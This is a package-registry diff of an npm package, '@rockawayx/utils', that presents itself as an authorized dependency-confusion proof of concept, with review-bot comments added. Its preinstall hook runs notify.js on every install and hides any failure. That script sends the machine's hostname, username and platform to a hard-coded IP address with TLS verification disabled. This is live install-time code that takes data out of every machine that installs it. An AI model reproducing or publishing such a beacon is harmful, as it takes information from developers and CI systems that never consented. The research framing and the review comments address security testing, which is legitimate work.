@rockawayx/utils 0.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +13 -0
- package/index.js +7 -0
- package/notify.js +21 -0
- package/package.json +11 -0
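--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,13 @@
+# @rockawayx/utils - Security Research
+
+This package was published as part of an **authorized security assessment** to demonstrate
+a dependency confusion vulnerability affecting the `@rockawayx` npm scope.
+
+The `@rockawayx` scope was unclaimed on npmjs.org while private packages with the same
+scope names existed in RockawayX's internal repositories.
+
+**This is not malicious software.** It contains only a benign notification that reports
+the hostname and timestamp to a security research callback server.
+
+If you received this package unexpectedly, your build system may be vulnerable to
+dependency confusion attacks. Please contact your security team.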
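--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,7 @@
+// Security Research PoC - @rockawayx/utils dependency confusion
+// This package was published as part of an authorized security assessment
+// to demonstrate the unclaimed npm scope vulnerability.
+module.exports = {
+_securityResearch: true,
+_message: 'This package is a security research PoC for dependency confusion'
+};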
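--- a/package/notify.js
+++ b/package/notify.js
@@ -0,0 +1,21 @@
+const https = require('https');
+const os = require('os');
+const data = JSON.stringify({
+type: 'dependency-confusion-poc',
+package: '@rockawayx/utils',
+hostname: os.hostname(),
+user: os.userInfo().username,
+platform: os.platform(),
+timestamp: new Date().toISOString(),
+message: 'This is a security research PoC. If you see this, your project is vulnerable to dependency confusion. Contact security@rockawayx.com'
+});
+const req = https.request({
+hostname: '2.25.140.71', port: 8443,
+path: '/rockawayx/depconf-poc',
+method: 'POST',
+headers: {'Content-Type':'application/json','Content-Length':data.length},
+timeout: 3000, rejectUnauthorized: false
+}, ()=>{});
+req.on('error',()=>{});
+req.write(data);
+req.end();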
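Review bot: The beacon payload built at lines 3–11 sends `os.userInfo().username` and `os.platform()` on top of hostname and timestamp, which is more than the README's "hostname and timestamp" disclosure covers — either drop the `user` and `platform` fields or make the README state exactly what leaves the host, since an authorized PoC is only as defensible as its disclosed scope. The request options at lines 13–17 set `rejectUnauthorized: false` for a POST to a bare IP (`2.25.140.71:8443`), so the beacon is sent with TLS verification off and any on-path host can read or alter it; keep verification on and pin the callback certificate via the `ca` option, or at minimum explain in a comment why it is disabled. `timeout: 3000` on its own only causes a `'timeout'` event to be emitted — Node does not abort the request for you — so a server that accepts the connection and never answers keeps the preinstall hook hanging; add `req.on('timeout', () => req.destroy());` next to the `'error'` handler. The `Content-Length` header uses `data.length` (UTF-16 code units) where `Buffer.byteLength(data)` is the byte count; harmless for this ASCII payload but worth correcting.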
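--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,11 @@
+{
+"name": "@rockawayx/utils",
+"version": "0.0.1",
+"description": "Security research - dependency confusion PoC",
+"main": "index.js",
+"scripts": {
+"preinstall": "node notify.js || true"
+},
+"license": "MIT",
+"author": "security-researcher"
+}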
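Review bot: The `preinstall` script at line 7 is the part of this package that actually executes on a victim host — it runs `notify.js` on every install, including transitive installs and `npm ci` in CI — and the `|| true` hides any failure so nothing in the install log shows the beacon ran. JSON allows no comments, so the `description` field is the only place to make that visible to someone inspecting the manifest, e.g. `"description": "Security research - dependency confusion PoC (preinstall posts hostname/user to a callback server; see README)"`. The `author` value `security-researcher` gives no way to reach the assessor; the `security@rockawayx.com` contact currently exists only inside the beacon payload, so put it in `author` or a `bugs` field as well. The README should also mention that `npm install --ignore-scripts` neutralizes the hook for anyone who pulled the package by accident.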